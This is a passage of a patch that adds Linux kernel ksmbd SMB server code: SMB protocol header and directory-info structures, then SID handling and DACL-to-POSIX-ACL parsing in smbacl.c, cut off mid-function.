++#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
++		| READ_CONTROL | SYNCHRONIZE)
++
++/* generic flags for file open */
++#define GENERIC_READ_FLAGS	(READ_CONTROL | FILE_READ_DATA | \
++		FILE_READ_ATTRIBUTES | \
++		FILE_READ_EA | SYNCHRONIZE)
++
++#define GENERIC_WRITE_FLAGS	(READ_CONTROL | FILE_WRITE_DATA | \
++		FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | \
++		FILE_APPEND_DATA | SYNCHRONIZE)
++
++#define GENERIC_EXECUTE_FLAGS	(READ_CONTROL | FILE_EXECUTE | \
++		FILE_READ_ATTRIBUTES | SYNCHRONIZE)
++
++#define GENERIC_ALL_FLAGS	(DELETE | READ_CONTROL | WRITE_DAC | \
++		WRITE_OWNER | SYNCHRONIZE | FILE_READ_DATA | \
++		FILE_WRITE_DATA | FILE_APPEND_DATA | \
++		FILE_READ_EA | FILE_WRITE_EA | \
++		FILE_EXECUTE | FILE_DELETE_CHILD | \
++		FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES)
++
++#define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
++#define SMB_COM_NEGOTIATE		0x72
++#define SMB1_CLIENT_GUID_SIZE		(16)
++
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
++#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
++#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
++
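++/*
++ * Classic SMB1 packet header; smb_buf_length holds the 4-byte NetBIOS
++ * session length that precedes the rest of the packet on the wire.
++ */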
++struct smb_hdr {
++	__be32 smb_buf_length;
++	__u8 Protocol[4];
++	__u8 Command;
++	union {
++		struct {
++			__u8 ErrorClass;
++			__u8 Reserved;
++			__le16 Error;
++		} __packed DosError;
++		__le32 CifsError;
++	} __packed Status;
++	__u8 Flags;
++	__le16 Flags2;          /* note: le */
++	__le16 PidHigh;
++	union {
++		struct {
++			__le32 SequenceNumber;  /* le */
++			__u32 Reserved; /* zero */
++		} __packed Sequence;
++		__u8 SecuritySignature[8];      /* le */
++	} __packed Signature;
++	__u8 pad[2];
++	__le16 Tid;
++	__le16 Pid;
++	__le16 Uid;
++	__le16 Mid;
++	__u8 WordCount;
++} __packed;
++
++struct smb_negotiate_req {
++	struct smb_hdr hdr;     /* wct = 0 */
++	__le16 ByteCount;
++	unsigned char DialectsArray[1];
++} __packed;
++
++struct smb_negotiate_rsp {
++	struct smb_hdr hdr;     /* wct = 17 */
++	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
++	__le16 ByteCount;
++} __packed;
++
++struct filesystem_attribute_info {
++	__le32 Attributes;
++	__le32 MaxPathNameComponentLength;
++	__le32 FileSystemNameLen;
++	__le16 FileSystemName[1]; /* do not have to save this - get subset? */
++} __packed;
++
++struct filesystem_device_info {
++	__le32 DeviceType;
++	__le32 DeviceCharacteristics;
++} __packed; /* device info level 0x104 */
++
++struct filesystem_vol_info {
++	__le64 VolumeCreationTime;
++	__le32 SerialNumber;
++	__le32 VolumeLabelSize;
++	__le16 Reserved;
++	__le16 VolumeLabel[1];
++} __packed;
++
++struct filesystem_info {
++	__le64 TotalAllocationUnits;
++	__le64 FreeAllocationUnits;
++	__le32 SectorsPerAllocationUnit;
++	__le32 BytesPerSector;
++} __packed;     /* size info, level 0x103 */
++
++#define EXTENDED_INFO_MAGIC 0x43667364	/* Cfsd */
++#define STRING_LENGTH 28
++
++struct fs_extended_info {
++	__le32 magic;
++	__le32 version;
++	__le32 release;
++	__u64 rel_date;
++	char    version_string[STRING_LENGTH];
++} __packed;
++
++struct object_id_info {
++	char objid[16];
++	struct fs_extended_info extended_info;
++} __packed;
++
++struct file_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	char FileName[1];
++} __packed;   /* level 0x101 FF resp data */
++
++struct file_names_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le32 FileNameLength;
++	char FileName[1];
++} __packed;   /* level 0xc FF resp data */
++
++struct file_full_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize;
++	char FileName[1];
++} __packed; /* level 0x102 FF resp */
++
++struct file_both_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	__u8   ShortNameLength;
++	__u8   Reserved;
++	__u8   ShortName[24];
++	char FileName[1];
++} __packed; /* level 0x104 FFrsp data */
++
++struct file_id_both_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	__u8   ShortNameLength;
++	__u8   Reserved;
++	__u8   ShortName[24];
++	__le16 Reserved2;
++	__le64 UniqueId;
++	char FileName[1];
++} __packed;
++
++struct file_id_full_dir_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* EA size */
++	__le32 Reserved;
++	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bits */
++	char FileName[1];
++} __packed; /* level 0x105 FF rsp data */
++
++struct smb_version_values {
++	char		*version_string;
++	__u16		protocol_id;
++	__le16		lock_cmd;
++	__u32		capabilities;
++	__u32		max_read_size;
++	__u32		max_write_size;
++	__u32		max_trans_size;
++	__u32		max_credits;
++	__u32		large_lock_type;
++	__u32		exclusive_lock_type;
++	__u32		shared_lock_type;
++	__u32		unlock_lock_type;
++	size_t		header_size;
++	size_t		max_header_size;
++	size_t		read_rsp_size;
++	unsigned int	cap_unix;
++	unsigned int	cap_nt_find;
++	unsigned int	cap_large_files;
++	__u16		signing_enabled;
++	__u16		signing_required;
++	size_t		create_lease_size;
++	size_t		create_durable_size;
++	size_t		create_durable_v2_size;
++	size_t		create_mxac_size;
++	size_t		create_disk_id_size;
++	size_t		create_posix_size;
++};
++
++struct filesystem_posix_info {
++	/* For undefined recommended transfer size return -1 in that field */
++	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
++	__le32 BlockSize;
++	/* The next three fields are in terms of the block size
++	 * (above). If the block size is unknown, 4096 would be a
++	 * reasonable block size for a server to report.
++	 * Note that returning the blocks/blocksavail removes the need
++	 * to make a second call (to QFSInfo level 0x103) to get this info.
++	 * UserBlocksAvail is typically less than or equal to BlocksAvail;
++	 * if no distinction is made, return the same value in each.
++	 */
++	__le64 TotalBlocks;
++	__le64 BlocksAvail;       /* bfree */
++	__le64 UserBlocksAvail;   /* bavail */
++	/* For undefined Node fields or FSID return -1 */
++	__le64 TotalFileNodes;
++	__le64 FreeFileNodes;
++	__le64 FileSysIdentifier;   /* fsid */
++	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
++	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
++} __packed;
++
++struct smb_version_ops {
++	u16 (*get_cmd_val)(struct ksmbd_work *swork);
++	int (*init_rsp_hdr)(struct ksmbd_work *swork);
++	void (*set_rsp_status)(struct ksmbd_work *swork, __le32 err);
++	int (*allocate_rsp_buf)(struct ksmbd_work *work);
++	int (*set_rsp_credits)(struct ksmbd_work *work);
++	int (*check_user_session)(struct ksmbd_work *work);
++	int (*get_ksmbd_tcon)(struct ksmbd_work *work);
++	bool (*is_sign_req)(struct ksmbd_work *work, unsigned int command);
++	int (*check_sign_req)(struct ksmbd_work *work);
++	void (*set_sign_rsp)(struct ksmbd_work *work);
++	int (*generate_signingkey)(struct ksmbd_session *sess, struct ksmbd_conn *conn);
++	int (*generate_encryptionkey)(struct ksmbd_conn *conn, struct ksmbd_session *sess);
++	bool (*is_transform_hdr)(void *buf);
++	int (*decrypt_req)(struct ksmbd_work *work);
++	int (*encrypt_resp)(struct ksmbd_work *work);
++};
++
++struct smb_version_cmds {
++	int (*proc)(struct ksmbd_work *swork);
++};
++
++int ksmbd_min_protocol(void);
++int ksmbd_max_protocol(void);
++
++int ksmbd_lookup_protocol_idx(char *str);
++
++int ksmbd_verify_smb_message(struct ksmbd_work *work);
++bool ksmbd_smb_request(struct ksmbd_conn *conn);
++
++int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
++
++void ksmbd_init_smb_server(struct ksmbd_work *work);
++
++struct ksmbd_kstat;
++int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
++				      int info_level,
++				      struct ksmbd_file *dir,
++				      struct ksmbd_dir_info *d_info,
++				      char *search_pattern,
++				      int (*fn)(struct ksmbd_conn *,
++						int,
++						struct ksmbd_dir_info *,
++						struct ksmbd_kstat *));
++
++int ksmbd_extract_shortname(struct ksmbd_conn *conn,
++			    const char *longname,
++			    char *shortname);
++
++int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command);
++
++int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp);
++int ksmbd_override_fsids(struct ksmbd_work *work);
++void ksmbd_revert_fsids(struct ksmbd_work *work);
++
++unsigned int ksmbd_server_side_copy_max_chunk_count(void);
++unsigned int ksmbd_server_side_copy_max_chunk_size(void);
++unsigned int ksmbd_server_side_copy_max_total_size(void);
++bool is_asterisk(char *p);
++__le32 smb_map_generic_desired_access(__le32 daccess);
++
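++/*
++ * The NetBIOS session header stores the PDU length in its low 24 bits;
++ * these helpers read and extend that length field.
++ */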
++static inline unsigned int get_rfc1002_len(void *buf)
++{
++	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
++}
++
++static inline void inc_rfc1001_len(void *buf, int count)
++{
++	be32_add_cpu((__be32 *)buf, count);
++}
++#endif /* __SMB_COMMON_H__ */
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+new file mode 100644
+index 0000000000000..b05ff9b146b55
+--- /dev/null
++++ b/fs/smb/server/smbacl.c
+@@ -0,0 +1,1436 @@
++// SPDX-License-Identifier: LGPL-2.1+
++/*
++ *   Copyright (C) International Business Machines  Corp., 2007,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
++ *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/string.h>
++#include <linux/mnt_idmapping.h>
++
++#include "smbacl.h"
++#include "smb_common.h"
++#include "server.h"
++#include "misc.h"
++#include "mgmt/share_config.h"
++
++static const struct smb_sid domain = {1, 4, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(21), cpu_to_le32(1), cpu_to_le32(2), cpu_to_le32(3),
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* security id for CREATOR OWNER (S-1-3-0) */
++static const struct smb_sid creator_owner = {
++	1, 1, {0, 0, 0, 0, 0, 3}, {0} };
++/* security id for CREATOR GROUP (S-1-3-1) */
++static const struct smb_sid creator_group = {
++	1, 1, {0, 0, 0, 0, 0, 3}, {cpu_to_le32(1)} };
++
++/* security id for everyone/world system group */
++static const struct smb_sid sid_everyone = {
++	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
++/* security id for Authenticated Users system group */
++static const struct smb_sid sid_authusers = {
++	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
++
++/* S-1-22-1 Unmapped Unix users */
++static const struct smb_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-22-2 Unmapped Unix groups */
++static const struct smb_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/*
++ * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++
++/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
++
++/* S-1-5-88-1 Unix uid */
++static const struct smb_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-2 Unix gid */
++static const struct smb_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-3 Unix mode */
++static const struct smb_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/*
++ * Compare two SIDs (each roughly equivalent to a UUID for a user or group):
++ * returns zero if they are the same, non-zero if they do not match.
++ */
++int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid)
++{
++	int i;
++	int num_subauth, num_sat, num_saw;
++
++	if (!ctsid || !cwsid)
++		return 1;
++
++	/* compare the revision */
++	if (ctsid->revision != cwsid->revision) {
++		if (ctsid->revision > cwsid->revision)
++			return 1;
++		else
++			return -1;
++	}
++
++	/* compare all of the six auth values */
++	for (i = 0; i < NUM_AUTHS; ++i) {
++		if (ctsid->authority[i] != cwsid->authority[i]) {
++			if (ctsid->authority[i] > cwsid->authority[i])
++				return 1;
++			else
++				return -1;
++		}
++	}
++
++	/* compare all of the subauth values if any */
++	num_sat = ctsid->num_subauth;
++	num_saw = cwsid->num_subauth;
++	num_subauth = num_sat < num_saw ? num_sat : num_saw;
++	if (num_subauth) {
++		for (i = 0; i < num_subauth; ++i) {
++			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
++				if (le32_to_cpu(ctsid->sub_auth[i]) >
++				    le32_to_cpu(cwsid->sub_auth[i]))
++					return 1;
++				else
++					return -1;
++			}
++		}
++	}
++
++	return 0; /* sids compare/match */
++}
++
++static void smb_copy_sid(struct smb_sid *dst, const struct smb_sid *src)
++{
++	int i;
++
++	dst->revision = src->revision;
++	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
++	for (i = 0; i < NUM_AUTHS; ++i)
++		dst->authority[i] = src->authority[i];
++	for (i = 0; i < dst->num_subauth; ++i)
++		dst->sub_auth[i] = src->sub_auth[i];
++}
++
++/*
++ * Change the POSIX mode to reflect the ACE's permissions; only part of the
++ * existing mode is overwritten. The bits to set can be S_IRWXU, S_IRWXG or
++ * S_IRWXO, i.e. 00700, 00070 or 00007.
++ */
++static umode_t access_flags_to_mode(struct smb_fattr *fattr, __le32 ace_flags,
++				    int type)
++{
++	__u32 flags = le32_to_cpu(ace_flags);
++	umode_t mode = 0;
++
++	if (flags & GENERIC_ALL) {
++		mode = 0777;
++		ksmbd_debug(SMB, "all perms\n");
++		return mode;
++	}
++
++	if ((flags & GENERIC_READ) || (flags & FILE_READ_RIGHTS))
++		mode = 0444;
++	if ((flags & GENERIC_WRITE) || (flags & FILE_WRITE_RIGHTS)) {
++		mode |= 0222;
++		if (S_ISDIR(fattr->cf_mode))
++			mode |= 0111;
++	}
++	if ((flags & GENERIC_EXECUTE) || (flags & FILE_EXEC_RIGHTS))
++		mode |= 0111;
++
++	if (type == ACCESS_DENIED_ACE_TYPE || type == ACCESS_DENIED_OBJECT_ACE_TYPE)
++		mode = ~mode;
++
++	ksmbd_debug(SMB, "access flags 0x%x mode now %04o\n", flags, mode);
++
++	return mode;
++}
++
++/*
++ * Generate access flags to reflect permissions mode is the existing mode.
++ * This function is called for every ACE in the DACL whose SID matches
++ * with either owner or group or everyone.
++ */
++static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
++				 __u32 *pace_flags)
++{
++	/* reset access mask */
++	*pace_flags = 0x0;
++
++	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
++	mode &= bits_to_use;
++
++	/*
++	 * Check for R/W/X (UGO): we do not know whose bits these are, but
++	 * bits_to_use has already cleared every bit except the RWX bits of
++	 * user, group or other.
++	 */
++	if (mode & 0444)
++		*pace_flags |= SET_FILE_READ_RIGHTS;
++	if (mode & 0222)
++		*pace_flags |= FILE_WRITE_RIGHTS;
++	if (mode & 0111)
++		*pace_flags |= SET_FILE_EXEC_RIGHTS;
++
++	ksmbd_debug(SMB, "mode: %o, access flags now 0x%x\n",
++		    mode, *pace_flags);
++}
++
++static __u16 fill_ace_for_sid(struct smb_ace *pntace,
++			      const struct smb_sid *psid, int type, int flags,
++			      umode_t mode, umode_t bits)
++{
++	int i;
++	__u16 size = 0;
++	__u32 access_req = 0;
++
++	pntace->type = type;
++	pntace->flags = flags;
++	mode_to_access_flags(mode, bits, &access_req);
++	if (!access_req)
++		access_req = SET_MINIMUM_RIGHTS;
++	pntace->access_req = cpu_to_le32(access_req);
++
++	pntace->sid.revision = psid->revision;
++	pntace->sid.num_subauth = psid->num_subauth;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = psid->authority[i];
++	for (i = 0; i < psid->num_subauth; i++)
++		pntace->sid.sub_auth[i] = psid->sub_auth[i];
++
++	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
++	pntace->size = cpu_to_le16(size);
++
++	return size;
++}
++
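++/*
++ * Compose a SID for @cid: copy the base SID for @sidtype and, for the
++ * types that take one, append @cid as the final RID sub-authority.
++ */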
++void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid)
++{
++	switch (sidtype) {
++	case SIDOWNER:
++		smb_copy_sid(ssid, &server_conf.domain_sid);
++		break;
++	case SIDUNIX_USER:
++		smb_copy_sid(ssid, &sid_unix_users);
++		break;
++	case SIDUNIX_GROUP:
++		smb_copy_sid(ssid, &sid_unix_groups);
++		break;
++	case SIDCREATOR_OWNER:
++		smb_copy_sid(ssid, &creator_owner);
++		return;
++	case SIDCREATOR_GROUP:
++		smb_copy_sid(ssid, &creator_group);
++		return;
++	case SIDNFS_USER:
++		smb_copy_sid(ssid, &sid_unix_NFS_users);
++		break;
++	case SIDNFS_GROUP:
++		smb_copy_sid(ssid, &sid_unix_NFS_groups);
++		break;
++	case SIDNFS_MODE:
++		smb_copy_sid(ssid, &sid_unix_NFS_mode);
++		break;
++	default:
++		return;
++	}
++
++	/* RID */
++	ssid->sub_auth[ssid->num_subauth] = cpu_to_le32(cid);
++	ssid->num_subauth++;
++}
++
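++/*
++ * Map the SID's final sub-authority (the RID) to a kuid or kgid in the
++ * mount's user namespace; fail unless the resulting id is valid.
++ */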
++static int sid_to_id(struct user_namespace *user_ns,
++		     struct smb_sid *psid, uint sidtype,
++		     struct smb_fattr *fattr)
++{
++	int rc = -EINVAL;
++
++	/*
++	 * If we have too many subauthorities, then something is really wrong.
++	 * Just return an error.
++	 */
++	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
++		pr_err("%s: %u subauthorities is too many!\n",
++		       __func__, psid->num_subauth);
++		return -EIO;
++	}
++
++	if (sidtype == SIDOWNER) {
++		kuid_t uid;
++		uid_t id;
++
++		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
++		uid = KUIDT_INIT(id);
++		uid = from_vfsuid(user_ns, &init_user_ns, VFSUIDT_INIT(uid));
++		if (uid_valid(uid)) {
++			fattr->cf_uid = uid;
++			rc = 0;
++		}
++	} else {
++		kgid_t gid;
++		gid_t id;
++
++		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
++		gid = KGIDT_INIT(id);
++		gid = from_vfsgid(user_ns, &init_user_ns, VFSGIDT_INIT(gid));
++		if (gid_valid(gid)) {
++			fattr->cf_gid = gid;
++			rc = 0;
++		}
++	}
++
++	return rc;
++}
++
++void posix_state_to_acl(struct posix_acl_state *state,
++			struct posix_acl_entry *pace)
++{
++	int i;
++
++	pace->e_tag = ACL_USER_OBJ;
++	pace->e_perm = state->owner.allow;
++	for (i = 0; i < state->users->n; i++) {
++		pace++;
++		pace->e_tag = ACL_USER;
++		pace->e_uid = state->users->aces[i].uid;
++		pace->e_perm = state->users->aces[i].perms.allow;
++	}
++
++	pace++;
++	pace->e_tag = ACL_GROUP_OBJ;
++	pace->e_perm = state->group.allow;
++
++	for (i = 0; i < state->groups->n; i++) {
++		pace++;
++		pace->e_tag = ACL_GROUP;
++		pace->e_gid = state->groups->aces[i].gid;
++		pace->e_perm = state->groups->aces[i].perms.allow;
++	}
++
++	if (state->users->n || state->groups->n) {
++		pace++;
++		pace->e_tag = ACL_MASK;
++		pace->e_perm = state->mask.allow;
++	}
++
++	pace++;
++	pace->e_tag = ACL_OTHER;
++	pace->e_perm = state->other.allow;
++}
++
++int init_acl_state(struct posix_acl_state *state, int cnt)
++{
++	int alloc;
++
++	memset(state, 0, sizeof(struct posix_acl_state));
++	/*
++	 * In the worst case, each individual acl could be for a distinct
++	 * named user or group, but we don't know which, so we allocate
++	 * enough space for either:
++	 */
++	alloc = sizeof(struct posix_ace_state_array)
++		+ cnt * sizeof(struct posix_user_ace_state);
++	state->users = kzalloc(alloc, GFP_KERNEL);
++	if (!state->users)
++		return -ENOMEM;
++	state->groups = kzalloc(alloc, GFP_KERNEL);
++	if (!state->groups) {
++		kfree(state->users);
++		return -ENOMEM;
++	}
++	return 0;
++}
++
++void free_acl_state(struct posix_acl_state *state)
++{
++	kfree(state->users);
++	kfree(state->groups);
++}
++
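++/*
++ * Walk the DACL's ACEs, deriving POSIX mode bits from the ACEs whose SID
++ * matches the owner, group or everyone, and accumulating access and
++ * default POSIX ACL entries for any other SIDs that map to local ids.
++ */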
++static void parse_dacl(struct user_namespace *user_ns,
++		       struct smb_acl *pdacl, char *end_of_acl,
++		       struct smb_sid *pownersid, struct smb_sid *pgrpsid,
++		       struct smb_fattr *fattr)
++{
++	int i, ret;
++	int num_aces = 0;
++	unsigned int acl_size;
++	char *acl_base;
++	struct smb_ace **ppace;
++	struct posix_acl_entry *cf_pace, *cf_pdace;
++	struct posix_acl_state acl_state, default_acl_state;
++	umode_t mode = 0, acl_mode;
++	bool owner_found = false, group_found = false, others_found = false;
++
++	if (!pdacl)
++		return;
++
++	/* validate that we do not go past end of acl */
++	if (end_of_acl < (char *)pdacl + sizeof(struct smb_acl) ||
++	    end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
++		pr_err("ACL too small to parse DACL\n");
++		return;
++	}
++
++	ksmbd_debug(SMB, "DACL revision %d size %d num aces %d\n",
++		    le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
++		    le32_to_cpu(pdacl->num_aces));
++
++	acl_base = (char *)pdacl;
++	acl_size = sizeof(struct smb_acl);
++
++	num_aces = le32_to_cpu(pdacl->num_aces);
++	if (num_aces <= 0)
++		return;
++
++	if (num_aces > ULONG_MAX / sizeof(struct smb_ace *))
++		return;
++
++	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
++	if (!ppace)
++		return;
++
++	ret = init_acl_state(&acl_state, num_aces);
++	if (ret)
++		return;
++	ret = init_acl_state(&default_acl_state, num_aces);
++	if (ret) {
++		free_acl_state(&acl_state);
++		return;
++	}
++
++	/*
++	 * Reset the rwx permissions for user/group/other.
++	 * Also, if num_aces is 0, i.e. the DACL has no ACEs,
++	 * user/group/other have no permissions.
++	 */
++	for (i = 0; i < num_aces; ++i) {
++		if (end_of_acl - acl_base < acl_size)
++			break;
++
++		ppace[i] = (struct smb_ace *)(acl_base + acl_size);
++		acl_base = (char *)ppace[i];
++		acl_size = offsetof(struct smb_ace, sid) +
++			offsetof(struct smb_sid, sub_auth);
++
++		if (end_of_acl - acl_base < acl_size ||
++		    ppace[i]->sid.num_subauth > SID_MAX_SUB_AUTHORITIES ||
++		    (end_of_acl - acl_base <
++		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth) ||
++		    (le16_to_cpu(ppace[i]->size) <
++		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth))
++			break;
++
++		acl_size = le16_to_cpu(ppace[i]->size);
++		ppace[i]->access_req =
++			smb_map_generic_desired_access(ppace[i]->access_req);
++
++		if (!(compare_sids(&ppace[i]->sid, &sid_unix_NFS_mode))) {
++			fattr->cf_mode =
++				le32_to_cpu(ppace[i]->sid.sub_auth[2]);
++			break;
++		} else if (!compare_sids(&ppace[i]->sid, pownersid)) {
++			acl_mode = access_flags_to_mode(fattr,
++							ppace[i]->access_req,
++							ppace[i]->type);
++			acl_mode &= 0700;
++
++			if (!owner_found) {
++				mode &= ~(0700);
++				mode |= acl_mode;
++			}
++			owner_found = true;
++		} else if (!compare_sids(&ppace[i]->sid, pgrpsid) ||
++			   ppace[i]->sid.sub_auth[ppace[i]->sid.num_subauth - 1] ==
++			    DOMAIN_USER_RID_LE) {
++			acl_mode = access_flags_to_mode(fattr,
++							ppace[i]->access_req,
++							ppace[i]->type);
++			acl_mode &= 0070;
++			if (!group_found) {
++				mode &= ~(0070);
++				mode |= acl_mode;
++			}
++			group_found = true;
++		} else if (!compare_sids(&ppace[i]->sid, &sid_everyone)) {
++			acl_mode = access_flags_to_mode(fattr,
++							ppace[i]->access_req,
++							ppace[i]->type);
++			acl_mode &= 0007;
++			if (!others_found) {
++				mode &= ~(0007);
++				mode |= acl_mode;
++			}
++			others_found = true;
++		} else if (!compare_sids(&ppace[i]->sid, &creator_owner)) {
++			continue;
++		} else if (!compare_sids(&ppace[i]->sid, &creator_group)) {
++			continue;
++		} else if (!compare_sids(&ppace[i]->sid, &sid_authusers)) {
++			continue;
++		} else {
++			struct smb_fattr temp_fattr;
++
++			acl_mode = access_flags_to_mode(fattr, ppace[i]->access_req,
++							ppace[i]->type);
++			temp_fattr.cf_uid = INVALID_UID;
++			ret = sid_to_id(user_ns, &ppace[i]->sid, SIDOWNER, &temp_fattr);
++			if (ret || uid_eq(temp_fattr.cf_uid, INVALID_UID)) {
++				pr_err("%s: Error %d mapping Owner SID to uid\n",
++				       __func__, ret);
++				continue;
++			}
++
++			acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
++			acl_state.users->aces[acl_state.users->n].uid =
++				temp_fattr.cf_uid;
++			acl_state.users->aces[acl_state.users->n++].perms.allow =
++				((acl_mode & 0700) >> 6) | 0004;
++			default_acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
++			default_acl_state.users->aces[default_acl_state.users->n].uid =
++				temp_fattr.cf_uid;
++			default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
++				((acl_mode & 0700) >> 6) | 0004;
++		}
++	}
++	kfree(ppace);
++
++	if (owner_found) {
++		/* The owner must be set to at least read-only. */
++		acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
++		acl_state.users->aces[acl_state.users->n].uid = fattr->cf_uid;
++		acl_state.users->aces[acl_state.users->n++].perms.allow =
++			((mode & 0700) >> 6) | 0004;
++		default_acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
++		default_acl_state.users->aces[default_acl_state.users->n].uid =
++			fattr->cf_uid;
++		default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
++			((mode & 0700) >> 6) | 0004;
++	}
++
++	if (group_found) {
++		acl_state.group.allow = (mode & 0070) >> 3;
++		acl_state.groups->aces[acl_state.groups->n].gid =
++			fattr->cf_gid;
++		acl_state.groups->aces[acl_state.groups->n++].perms.allow =
++			(mode & 0070) >> 3;
++		default_acl_state.group.allow = (mode & 0070) >> 3;
++		default_acl_state.groups->aces[default_acl_state.groups->n].gid =
++			fattr->cf_gid;
++		default_acl_state.groups->aces[default_acl_state.groups->n++].perms.allow =
++			(mode & 0070) >> 3;
++	}
++
++	if (others_found) {
++		fattr->cf_mode &= ~(0007);
++		fattr->cf_mode |= mode & 0007;
++
++		acl_state.other.allow = mode & 0007;
++		default_acl_state.other.allow = mode & 0007;
++	}
++
++	if (acl_state.users->n || acl_state.groups->n) {
++		acl_state.mask.allow = 0x07;
++
++		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++			fattr->cf_acls =
++				posix_acl_alloc(acl_state.users->n +
++					acl_state.groups->n + 4, GFP_KERNEL);
++			if (fattr->cf_acls) {
++				cf_pace = fattr->cf_acls->a_entries;
++				posix_state_to_acl(&acl_state, cf_pace);
++			}
++		}
++	}
++
++	if (default_acl_state.users->n || default_acl_state.groups->n) {
++		default_acl_state.mask.allow = 0x07;
++
++		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++			fattr->cf_dacls =
